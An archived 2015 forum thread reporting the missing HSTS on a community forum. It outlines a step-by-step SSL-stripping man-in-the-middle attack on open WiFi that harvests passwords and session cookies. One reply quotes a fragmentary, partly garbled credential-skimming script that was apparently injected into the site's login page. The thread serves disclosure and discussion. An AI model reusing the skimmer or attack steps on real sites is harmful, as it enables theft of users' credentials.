Problem/Bug No HSTS for

Discussion in 'Forum Feedback' started by lol768, Dec 9, 2015.

Thread Status:
Not open for further replies.
  1. Offline


    1. User types '' into their browser address bar and hits enter whilst at a conference on an open WiFi network. They've visited the site before in the past and now that it uses SSL everything should be okay, right?
    2. Attacker intercepts HTTP request on port 80. Normally the response would be something like:
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 09 Dec 2015 10:59:25 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      Server: cloudflare-nginx
    3. Attacker connects to on the victim's behalf, swallows the redirect response and serves all the secure pages back to the victim on port 80.
    4. Victim logs into the forums, inadvertently sends the password to the attacker and has their session cookie compromised too.
    5. Victim happens to have admin access. Attacker uses this to inject malicious scripts into the page and compromise even more accounts.
    6. Eventually someone notices and notifies Curse. Maybe the script is removed after a few months, maybe the users are informed - it doesn't matter because at this point all of the passwords of those who've logged in have been compromised. A smarter script would forcibly log the user out and make them login again to harvest the passwords of everyone who visited.
    Last edited: Dec 9, 2015
    ferrybig likes this.
  2. Offline


    MITM ftw!
  3. This wouldn't happen to be a disappointing Minecraft themed convention hosted in London, would it?
    teej107 likes this.
  4. Offline


    there was a recent bug where it wouldn't log you in. No matter how many times you "logged in", it wouldn't log you in.
  5. Offline


    @teej107 That was cookie related and may have had to do with the script (but I have no idea if it did).
  6. Offline


    Yeah who knows :p The bug did seem to appear after the admin account got compromised.
  7. Offline


    @Lolmewn I looked at the script. All it did was listen for the form submission. I don't think it would have caused the cookie issue, but it is strange that the time frames match.

    EDIT: Here's the script from October 22
    function authXen()
    var xmlhttp = getXmlHttp();
    var user = encodeURI(document.getElementById("ctrl_pageLogin_login").value);
    var pass = encodeURI(document.getElementById("ctrl_pageLogin_password").value);
    var url = "/web/20151022200106/";
    url = url.concat(user);
    url = url.concat("&p=");
    url = url.concat(pass);"GET", url);
    Last edited: Dec 28, 2015
  8. Offline


    Ultimately we can't know what the script did, it could have served different code based on the user agent, location of the victim, time of day. It could've evolved, changed its purpose etc.
  9. Offline


    Thanks for information... :)
Thread Status:
Not open for further replies.

Share This Page